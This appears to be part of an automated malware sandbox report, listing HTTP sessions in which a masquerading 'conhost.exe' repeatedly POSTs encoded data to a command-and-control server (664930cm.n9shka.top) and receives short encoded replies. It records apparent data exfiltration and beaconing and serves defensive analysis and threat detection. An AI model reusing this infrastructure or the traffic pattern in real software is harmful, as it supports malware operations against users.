                                                          80192.168.2.64979237.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:39.232589960 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:39.590984106 CEST1120OUTData Raw: 5d 55 5a 5f 5c 44 54 5f 5c 58 57 5a 54 5d 55 50 59 55 59 59 50 50 56 46 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]UZ_\DT_\XWZT]UPYUYYPPVF[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT".S5*!!['=6X$88/#;T3>R2%$4*<T;?!F/'P,1
                                                          Oct 1, 2024 05:58:39.847886086 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:39.987871885 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:39 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          81192.168.2.64979337.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:40.107616901 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:40.465281010 CEST1120OUTData Raw: 5d 56 5f 58 59 49 51 55 5c 58 57 5a 54 5c 55 5a 59 56 59 59 50 5a 56 47 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]V_XYIQU\XWZT\UZYVYYPZVG[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!^-#3T!<\>1=$.X2;8;3<$(1"2!+14U(!F/'P,
                                                          Oct 1, 2024 05:58:40.735183001 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:40.871229887 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:40 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          82192.168.2.64979437.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:41.000024080 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1112
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          83192.168.2.64979537.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:41.268526077 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1840
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:41.621535063 CEST1840OUTData Raw: 58 5d 5f 5c 59 41 54 5f 5c 58 57 5a 54 52 55 59 59 55 59 5c 50 5d 56 47 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: X]_\YAT_\XWZTRUYYUY\P]VG[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT":03R!')1!$X"_2?-#/%>4R2:W%$Z?1#<9!F/'P,
                                                          Oct 1, 2024 05:58:41.914860010 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:42.045919895 CEST308INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:41 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0e 1d 25 5f 25 37 2a 52 36 02 25 5f 3e 3f 33 5a 27 34 23 5a 2e 03 0d 19 25 59 38 05 39 32 07 02 2b 39 2e 12 31 3d 33 58 31 21 3a 10 27 36 20 5f 0d 10 22 10 35 5e 32 1d 2d 3a 34 05 29 31 34 09 27 30 27 58 30 33 00 19 28 00 05 0c 33 2f 2a 0d 24 12 26 57 2c 43 3c 13 2a 51 30 54 23 2b 2d 56 02 1e 22 56 24 2b 2e 0f 37 3f 13 5f 27 3b 34 58 22 06 2d 13 29 58 23 03 24 1a 0f 04 29 2e 3f 11 2b 2c 28 00 22 2a 0c 05 37 1f 25 14 33 09 27 5c 20 0d 2d 51 05 34 5a 50
                                                          Data Ascii: %_%7*R6%_>?3Z'4#Z.%Y892+9.1=3X1!:'6 _"5^2-:4)14'0'X03(3/*$&W,C<*Q0T#+-V"V$+.7?_';4X"-)X#$).?+,("*7%3'\ -Q4ZP


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          84192.168.2.64979637.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:41.388561010 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:41.747777939 CEST1120OUTData Raw: 58 51 5f 54 59 42 51 52 5c 58 57 5a 54 5f 55 59 59 51 59 59 50 59 56 41 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XQ_TYBQR\XWZT_UYYQYYPYVA[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"-U7V!+^=!\0*$(X,3 ',S&%%=(#+9!F/'P,9
                                                          Oct 1, 2024 05:58:42.016226053 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:42.147058964 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:41 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          85192.168.2.64979737.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:42.294735909 CEST347OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Oct 1, 2024 05:58:42.652846098 CEST1120OUTData Raw: 5d 55 5f 54 5c 46 51 53 5c 58 57 5a 54 5c 55 5a 59 57 59 5d 50 5e 56 43 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]U_T\FQS\XWZT\UZYWY]P^VC[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!.+"87>1)[$.5&#,U#S$(W%Q&4>1<?!F/'P,
                                                          Oct 1, 2024 05:58:42.901942015 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:43.030452967 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:42 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          86192.168.2.64979837.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:43.155525923 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:43.512151003 CEST1120OUTData Raw: 58 5d 5f 5c 59 49 54 55 5c 58 57 5a 54 59 55 5c 59 53 59 5b 50 51 56 47 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: X]_\YITU\XWZTYU\YSY[PQVG[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!^:3#W5#=5Z3--%+$/08'-($19%$2Z?V+)!F/'P,!
                                                          Oct 1, 2024 05:58:43.761688948 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:43.893146992 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:43 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          87192.168.2.64979937.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:44.016827106 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:44.372549057 CEST1120OUTData Raw: 58 55 5f 58 59 47 51 51 5c 58 57 5a 54 5e 55 5f 59 5b 59 5a 50 5d 56 41 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XU_XYGQQ\XWZT^U_Y[YZP]VA[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!_:37R">>3>[1+;8<3X(%V$42?"()!F/'P,=
                                                          Oct 1, 2024 05:58:44.633979082 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:44.764720917 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:44 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          88192.168.2.64980037.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:44.903740883 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:45.262123108 CEST1120OUTData Raw: 5d 57 5f 55 59 48 51 55 5c 58 57 5a 54 59 55 5d 59 57 59 5b 50 5f 56 42 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]W_UYHQU\XWZTYU]YWY[P_VB[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!Y-'!(8>&$=>%;Y/07V$'%1"&$&<2(!F/'P,!
                                                          Oct 1, 2024 05:58:45.510457039 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:45.638916016 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:45 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          89192.168.2.64980137.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:45.766976118 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:46.121481895 CEST1120OUTData Raw: 5d 56 5a 58 59 44 54 53 5c 58 57 5a 54 58 55 50 59 57 59 5b 50 5f 56 42 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]VZXYDTS\XWZTXUPYWY[P_VB[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!.#W5+)%\$>"[$88;<0V$!:2'2(<V+)!F/'P,%
                                                          Oct 1, 2024 05:58:46.369663000 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:46.500583887 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:46 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          90192.168.2.64980237.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:46.627408028 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:46.980992079 CEST1120OUTData Raw: 58 52 5a 59 5c 41 51 52 5c 58 57 5a 54 52 55 5d 59 5b 59 57 50 51 56 49 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XRZY\AQR\XWZTRU]Y[YWPQVI[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT":U "+4)_3.*Y1( 83<'(R%!>21?!(S+!F/'P,


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          91192.168.2.64980337.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:47.086890936 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1840
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:47.434097052 CEST1840OUTData Raw: 58 52 5a 5b 59 49 54 5f 5c 58 57 5a 54 5c 55 5f 59 57 59 56 50 5e 56 47 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XRZ[YIT_\XWZT\U_YWYVP^VG[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT":0?!8^>1!^'2X%_,0;V$7$1&Q%>28T?)!F/'P,
                                                          Oct 1, 2024 05:58:47.727000952 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:47.859420061 CEST308INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:47 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0e 1d 26 04 27 0a 2d 0e 21 5a 32 07 3e 3f 05 1e 27 27 02 06 2d 2d 2c 08 26 2f 27 5a 39 0b 25 03 2b 07 0f 04 25 3d 2f 5a 31 31 36 53 24 1c 20 5f 0d 10 22 58 22 16 36 51 2c 29 05 59 2a 22 34 42 32 0e 3f 1f 27 30 35 0f 3f 2e 24 55 27 5a 36 0a 30 12 35 0c 2c 35 01 02 3e 27 33 0d 23 2b 2d 56 02 1e 22 50 31 01 25 12 22 2c 36 04 30 38 2c 14 35 38 3d 57 3d 3e 3f 05 24 1a 2e 5e 3d 3d 02 03 2b 2c 3c 00 21 04 22 07 21 21 31 51 27 09 27 5c 20 0d 2d 51 05 34 5a 50
                                                          Data Ascii: &'-!Z2>?''--,&/'Z9%+%=/Z116S$ _"X"6Q,)Y*"4B2?'05?.$U'Z605,5>'3#+-V"P1%",608,58=W=>?$.^==+,<!"!!1Q''\ -Q4ZP


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          92192.168.2.64980437.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:47.344788074 CEST371OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1112
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 1, 2024 05:58:47.699661970 CEST1112OUTData Raw: 5d 51 5a 58 5c 45 51 54 5c 58 57 5a 54 5b 55 5e 59 5b 59 56 50 50 56 46 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: ]QZX\EQT\XWZT[U^Y[YVPPVF[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT!Y.# 5+?)-]0=>2?^;#0P&&-((9!F/'P,
                                                          Oct 1, 2024 05:58:47.971018076 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:48.105403900 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:47 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          93192.168.2.64980537.44.238.250801924C:\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\conhost.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 1, 2024 05:58:48.230947971 CEST347OUTPOST /VideojavascriptAuthdefaultSqllinuxwindowsprivatetempuploads.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                          Host: 664930cm.n9shka.top
                                                          Content-Length: 1120
                                                          Expect: 100-continue
                                                          Oct 1, 2024 05:58:48.590233088 CEST1120OUTData Raw: 58 54 5f 59 59 40 54 50 5c 58 57 5a 54 5a 55 5c 59 53 59 5d 50 50 56 49 5b 5e 41 59 55 57 58 5d 41 58 54 50 5b 5f 54 58 58 53 55 53 5f 54 5f 5c 5b 5c 58 59 5f 59 51 54 54 5c 55 55 57 50 56 49 5b 51 59 5f 5a 52 50 55 42 5f 5e 56 5a 5d 5f 5e 5a 5d
                                                          Data Ascii: XT_YY@TP\XWZTZU\YSY]PPVI[^AYUWX]AXTP[_TXXSUS_T_\[\XY_YQTT\UUWPVI[QY_ZRPUB_^VZ]_^Z]PPRD[_WVZUXYWYQRXP]Z^W^[FXYZ[^\TW]FYZQYAX\W^X]U\]YZ][X]U^RYGX_Z]Q\PX\YGYYZ__R[XWX[YW_T_^_TV]YW^\^Y_VPT"-W ;<^=2)^3%#\8/S$>'$22U&9( ?9!F/'P,-
                                                          Oct 1, 2024 05:58:48.836812019 CEST25INHTTP/1.1 100 Continue
                                                          Oct 1, 2024 05:58:48.965194941 CEST158INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Tue, 01 Oct 2024 03:58:48 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3c 55 5c 50
                                                          Data Ascii: <U\P


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
